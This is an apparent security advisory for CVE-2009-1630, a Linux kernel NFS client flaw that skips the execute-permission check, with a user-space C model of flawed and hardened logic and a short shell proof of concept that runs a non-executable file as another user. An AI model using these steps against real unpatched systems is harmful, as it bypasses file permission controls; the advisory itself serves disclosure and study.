Linux kernel 2.6.x
Linux Kernel NFS Client MAY_EXEC Permission Check Vulnerability
SSV ID:11320
SEBUG-Appdir:Linux
Published:2009-05-09
Vulnerable:
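Description:
BUGTRAQ ID: 34934
CVE(CAN) ID: CVE-2009-1630
The Linux kernel is the kernel used by the open-source Linux operating system. When atomic_open is available, the nfs_permission function in fs/nfs/dir.c of the Linux kernel NFS client implementation does not check the execute (EXEC or MAY_EXEC) permission bit, which allows local users to bypass restrictions and execute files.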
<*References
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=500297
http://marc.info/?l=oss-security&m=124220557025302&w=2
*>
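The description above, reduced to a user-space model with the flawed decision next to a hardened one. This is an added example, not kernel source and not code from the advisory. The `file_info` struct, both function names, the use of `MAY_OPEN` to mark an open request, and the hardened form are assumptions of this model.

```c
/* Simplified user-space model of the check described above; not kernel source. */
#include <stdio.h>

/* Mask bits with the values used in the kernel's include/linux/fs.h. */
#define MAY_EXEC 0x01
#define MAY_READ 0x04
#define MAY_OPEN 0x20

struct file_info { unsigned mode, uid, gid; };   /* hypothetical stand-in for an inode */

/* Owner/group/other mode-bit check: 0 = allowed, -1 = denied. */
static int mode_check(const struct file_info *f, unsigned uid, unsigned gid, int mask)
{
    unsigned bits = f->mode, want = (unsigned)mask & 7u;
    if (uid == f->uid)      bits >>= 6;
    else if (gid == f->gid) bits >>= 3;
    return ((bits & want) == want) ? 0 : -1;
}

/* Flawed shape: when atomic open is available, an open of a regular file
 * returns early, so a request carrying MAY_EXEC is never examined. */
static int permission_flawed(const struct file_info *f, unsigned uid, unsigned gid,
                             int mask, int atomic_open)
{
    if (atomic_open && (mask & MAY_OPEN))
        return 0;
    return mode_check(f, uid, gid, mask);
}

/* Hardened shape (assumed fix for this model): no early return for MAY_EXEC. */
static int permission_hardened(const struct file_info *f, unsigned uid, unsigned gid,
                               int mask, int atomic_open)
{
    if (atomic_open && (mask & MAY_OPEN) && !(mask & MAY_EXEC))
        return 0;
    return mode_check(f, uid, gid, mask);
}

int main(void)
{
    struct file_info foo = { 0744, 0, 0 };       /* constructed: root-owned, mode 744 */
    int mask = MAY_EXEC | MAY_OPEN;              /* modelled exec request */
    printf("flawed:   %d\n", permission_flawed(&foo, 1000, 1000, mask, 1));
    printf("hardened: %d\n", permission_hardened(&foo, 1000, 1000, mask, 1));
    return 0;
}
```

In the model, the hardened function still lets a plain read open take the early return, so only requests that carry MAY_EXEC fall through to the mode-bit check.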
Exploit:
The following procedures (methods) may contain something offensive; they are only for security research and teaching, at your own risk!
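# Mount the NFSv4 export
mount -t nfs4 server:/ /mnt4
echo "ls" >/mnt4/foo
# Mode 744: only the owner has the execute bit
chmod 744 /mnt4/foo
# Run as a non-owner; a correct permission check refuses this
su guest -c "/mnt4/foo"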
SEBUG Solution:
Linux
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.kernel.org/
// sebug.net [2009-05-17]